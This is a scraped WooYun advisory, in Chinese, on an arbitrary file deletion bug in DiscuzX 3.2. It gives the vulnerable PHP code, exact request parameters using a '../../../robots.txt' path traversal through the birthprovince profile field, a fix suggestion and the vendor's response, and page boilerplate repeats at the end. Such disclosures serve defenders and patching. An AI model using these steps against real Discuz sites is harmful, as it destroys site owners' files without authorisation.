DiscuzX 任意文件操作漏洞 | wooyun-2014-065513| WooYun.org

漏洞概要关注数(24) 关注此漏洞

缺陷编号：wooyun-2014-065513

漏洞标题：DiscuzX 任意文件操作漏洞

漏洞作者： Map

提交时间：2014-06-19 19:10

修复时间：2014-09-17 19:12

公开时间：2014-09-17 19:12

漏洞类型：任意文件遍历/下载

危害等级：高

自评Rank：12

漏洞状态：厂商已经确认

漏洞来源： http://www.wooyun.org，如有疑问或需要帮助请联系 [email protected]

Tags标签：无

4人收藏收藏
分享漏洞：

漏洞详情

披露状态：

2014-06-19：细节已通知厂商并且等待厂商处理中
2014-06-20：厂商已经确认，细节仅向厂商公开
2014-06-23：细节向第三方安全合作伙伴开放
2014-08-14：细节向核心白帽子及相关领域专家公开
2014-08-24：细节向普通白帽子公开
2014-09-03：细节向实习白帽子公开
2014-09-17：细节向公众公开

简要描述：

DiscuzX 任意文件操作漏洞

详细说明：

漏洞实际上是任意文件删除，但是由于删除的函数容易被定位，所以不方便写在简要描述或标题内。
昨天下载DiscuzX 3.2的代码，在
source/include/spacecp/spacecp_profile.php 中找到以下代码：

if($_GET['deletefile'] && is_array($_GET['deletefile'])) {
	foreach($_GET['deletefile'] as $key => $value) {
		if(isset($_G['cache']['profilesetting'][$key])) {
			echo (getglobal('setting/attachdir').'./profile/'.$space[$key]);
			@unlink(getglobal('setting/attachdir').'./profile/'.$space[$key]);
			@unlink(getglobal('setting/attachdir').'./profile/'.$verifyinfo['field'][$key]);
			$verifyarr[$key] = $setarr[$key] = '';
		}
	}
}

往上跟发现$_GET['deletefile']没有任何处理，$space[$key]来自

$space = getuserbyuid($_G['uid']);
space_merge($space, 'field_home');
space_merge($space, 'profile');

所以我们需要在$space变量中找到一个存在需要被删除的文件的位置，我用的字段是birthprovince

我们第一次在birthprovince里加上我们要删除的文件然后保存资料，下次我们提交$_GET['deletefile'][birthprovince]，那么$space[birthprovince]指向的文件就会被删除。

也就是说，我们提交birthprovince为../../../robots.txt
保存完之后，数据库里的$space['birthprovice']会成为../../../robots.txt，当我们提交$_GET['deletefile'][birthprovince]的时候，会去删除$space['birthprovice']指向的文件。
操作步骤：
那么登陆后提交：
birthprovince=../../../robots.txt&profilesubmit=1&formhash=85cf7ef0
注意，85cf7ef0是你的formhash。
http://localhost/dx/home.php?mod=spacecp&ac=profile&op=base
提示保存成功
这个时候你的birthprovince就是../../../robots.txt，产生的$space['birthprovince']就是../../../robots.txt了。
接下来我们来进行参数的操作，提交：
birthprovince=../../../robots.txt&profilesubmit=1&formhash=85cf7ef0
到
http://localhost/study/dx/home.php?mod=spacecp&ac=profile&op=base&deletefile[birthprovince]=aaaaaa
OK，文件就被顺利删除了。

漏洞证明：

如上面所述。

修复方案：

检查下deletefile指向的key是不是自定义字段里允许FILES的字段。

版权声明：转载请注明来源 Map@乌云

漏洞回应

厂商回应：

危害等级：高

漏洞Rank：20

确认时间：2014-06-20 10:24

厂商回复：

感谢您提供的信息。我们尽快给于修正。很神器的进攻思路。不过这也说明在程序的逻辑上，代码确实不够严谨。

WooYun.org

漏洞概要关注数(24) 关注此漏洞

缺陷编号：wooyun-2014-065513

漏洞标题：DiscuzX 任意文件操作漏洞

相关厂商：Discuz!

漏洞作者： Map

提交时间：2014-06-19 19:10

修复时间：2014-09-17 19:12

公开时间：2014-09-17 19:12

漏洞类型：任意文件遍历/下载

危害等级：高

自评Rank：12

漏洞状态：厂商已经确认

漏洞来源： http://www.wooyun.org，如有疑问或需要帮助请联系 [email protected]

Tags标签：无

4人收藏收藏
分享漏洞：

漏洞详情

披露状态：

简要描述：

详细说明：

漏洞证明：

修复方案：

版权声明：转载请注明来源 Map@乌云

漏洞回应

厂商回应：

厂商回复：

最新状态：

WooYun.org

漏洞概要 关注数(24) 关注此漏洞

缺陷编号：wooyun-2014-065513

漏洞标题：DiscuzX 任意文件操作漏洞

相关厂商：Discuz!

漏洞作者： Map

提交时间：2014-06-19 19:10

修复时间：2014-09-17 19:12

公开时间：2014-09-17 19:12

漏洞类型：任意文件遍历/下载

危害等级：高

自评Rank：12

漏洞状态：厂商已经确认

Tags标签： 无

4人收藏 收藏 var token=""; var id="wooyun-2014-065513"; $(".btn-fav").click(function(){ CollectBug(id,token); }); 分享漏洞：

漏洞详情

披露状态：

简要描述：

详细说明：

漏洞证明：

修复方案：

版权声明：转载请注明来源 Map@乌云

漏洞回应

厂商回应：

厂商回复：

最新状态：

漏洞概要关注数(24) 关注此漏洞

Tags标签：无

4人收藏收藏
分享漏洞：